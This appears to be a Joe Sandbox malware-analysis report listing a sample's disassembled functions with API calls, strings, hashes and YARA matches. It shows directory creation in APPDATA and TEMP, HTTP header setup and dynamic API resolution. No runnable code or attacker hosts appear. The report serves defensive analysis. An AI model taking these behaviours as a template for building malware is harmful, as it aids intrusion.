                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                            • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction Fuzzy Hash:
                                            Function 04D1A947 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04D1A2CB), ref: 04D1A94C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                            • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction Fuzzy Hash:
                                            Function 00415E19 Relevance: .6, Instructions: 637COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction ID: cacb134cf45b6d3893a07543428c3496bc224f7c3d1c732b13d01dd1be495d2a
                                            • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction Fuzzy Hash: DF323631E29F015DD7239A35D922336A649AFB73C4F56C737E815B5AA9EF28C4C34108
                                            Function 00858765 Relevance: .2, Instructions: 177COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27512dbce1650f601bfde0bd3ac02a87376571871174a8795c6e92a9a7318f2f
                                            • Instruction ID: d782e627636888b5d5938eb6138e05322512689bd1f9967ea0fc358326f82f81
                                            • Opcode Fuzzy Hash: 27512dbce1650f601bfde0bd3ac02a87376571871174a8795c6e92a9a7318f2f
                                            • Instruction Fuzzy Hash: 555146F3E441245BF714587CEC857A7BA86DBA0721F2B8239DE88E37C8E9799C0542C5
                                            Function 00928855 Relevance: .1, Instructions: 141COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f37081e5ee5b0e039eb84a9388bcaeb1d3ae7f1f7a2866ba1a37ac6b9b3adc1
                                            • Instruction ID: 9e4cf423ff0fb0e11b1c85d7e5476e16daae5e93f598f53a586615380da8f62c
                                            • Opcode Fuzzy Hash: 4f37081e5ee5b0e039eb84a9388bcaeb1d3ae7f1f7a2866ba1a37ac6b9b3adc1
                                            • Instruction Fuzzy Hash: 7E412BF3A096045BE3016E2DDCC576AF7EBEFE8210F16853DD6C483744E53999118683
                                            Function 009520A0 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30c76e4f955a0499a0f2ce11d26ce083e97331fa1b404c0c2d497b9578b1f430
                                            • Instruction ID: b88c27c4d5ac9a85e5619c0eab5b354373690314a65aa24db500e427918551d8
                                            • Opcode Fuzzy Hash: 30c76e4f955a0499a0f2ce11d26ce083e97331fa1b404c0c2d497b9578b1f430
                                            • Instruction Fuzzy Hash: FA316EF3618210ABE314992CEC457B7B7D9DB94330F2A863AFA94D73C0E97A9C0142D5
                                            Function 0040B690 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: b545b07da7e7745530abcd8f67b80a540579b97e0dd86f1b90800f2e494ad7bb
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: F1115B7720004243D604862DCDF45BBA395EBC5320B2C477BD0516BBD4D33BD841968D
                                            Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                            Function 04D1B8F7 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: f9b11c790c2a1a97a5dcc602ce95084896945f3579cb3a7f957fbe18259fc94a
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: D511C4B734004267D6548A7DF4B42B6E795FBC7320B2D42BBD8814B77AD222F1479600
                                            Function 00F4C9DB Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f4c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: d4c61e27c7d1b93ddcd5993caf1c50a019aef958f4b98cf7b0d5f07853c263a2
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 1411CE72340104AFD780CF59DC91FA277EAEB8D360B298065ED04CB306E679EC41D7A0
                                            Function 00825CD4 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b663b192dbb2d4db85527ab8893cc70c191c2ab14a8f829bd4d76fa4f67c849f
                                            • Instruction ID: 9824168095b6cfc6bea71523f0b9a63ac59dd53474e69655a7cfcad24cc3ccb4
                                            • Opcode Fuzzy Hash: b663b192dbb2d4db85527ab8893cc70c191c2ab14a8f829bd4d76fa4f67c849f
                                            • Instruction Fuzzy Hash: F2F06DB658857E6DAA06CE44BA186FF7768F9C1730770843AF802C7911D2B14E85AA74
                                            Function 04D10D90 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: c8289f9c297052bd3db4e64cfb9c3a6695d1bb689d24504931a86c199d93d02e
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: 1801F7727006009FDF22DF60E844BAA33E5FB86215F0584A4ED0A97A95E370B8818B80
                                            Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                            • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                            Function 00409B9D Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                            • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                            • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                            Strings
                                            • WakeAllConditionVariable, xrefs: 00409BDD
                                            • SleepConditionVariableCS, xrefs: 00409BD1
                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                            • kernel32.dll, xrefs: 00409BC0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                            • API String ID: 2565136772-3242537097
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                            Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                            Download Yara Rule
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                            • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                            • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                            • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                            • String ID: APPDATA$TMPDIR
                                            • API String ID: 1838500112-4048745339
                                            • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                            • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                            Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                            Strings
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$H_prolog3_
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                            • API String ID: 1254599795-787135837
                                            • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                            • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                            Function 0041C38F Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: DecodePointer
                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                            • API String ID: 3527080286-3064271455
                                            • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                            • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                            Function 0040BCBB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                            • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                            • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                            • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                            Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                            • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                            • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                            • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                            • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                            Function 04D1BF22 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 04D1C041
                                            • ___TypeMatch.LIBVCRUNTIME ref: 04D1C14F
                                            • _UnwindNestedFrames.LIBCMT ref: 04D1C2A1
                                            • CallUnexpected.LIBVCRUNTIME ref: 04D1C2BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: fe37b52a138c66234dc58c2c57dbf8adf4859d91f14cd3f7c3d2d3cce7683f58
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: 91B18672A50219FFDF14DFA4E9809AEBBB4FF04B18B10405AEC116B221D335FA51CBA1
                                            Function 04D19E04 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04D19DE2), ref: 04D19E10
                                            • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04D19DE2), ref: 04D19E1B
                                            • GetModuleHandleW.KERNEL32(0042000C,?,?,04D19DE2), ref: 04D19E2C
                                            • GetProcAddress.KERNEL32(00000000,00420028), ref: 04D19E3E
                                            • GetProcAddress.KERNEL32(00000000,00420044), ref: 04D19E4C
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04D19DE2), ref: 04D19E6F
                                            • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04D19E8B
                                            • CloseHandle.KERNEL32(0042D060,?,?,04D19DE2), ref: 04D19E9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID:
                                            • API String ID: 2565136772-0
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 22f845b40643fe4987b5c43ccdb103c582b95a821cf866f0fb35c0adbdb04758
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 1F0192B1B41711BBD7201BB0FC18B973AE8BB48B05F504072BD04E2171DB64D806CA69
                                            Function 00413DCC Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                            • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                            Function 04D24033 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction ID: e94a75514e73eab33028307fda844cb67d2109773b40d29a2a6e5659016f818a
                                            • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction Fuzzy Hash: 05B15372A00275AFEB12CF68CE81BAE7BA5FF65318F144155ED44AB281D274F901CBA0
                                            Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __RTC_Initialize.LIBCMT ref: 1000291D
                                            • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Initialize___scrt_uninitialize_crt
                                            • String ID:
                                            • API String ID: 2442719207-0
                                            • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                            • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                            Function 0040B7C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                            Strings
                                            Memory Dump Source
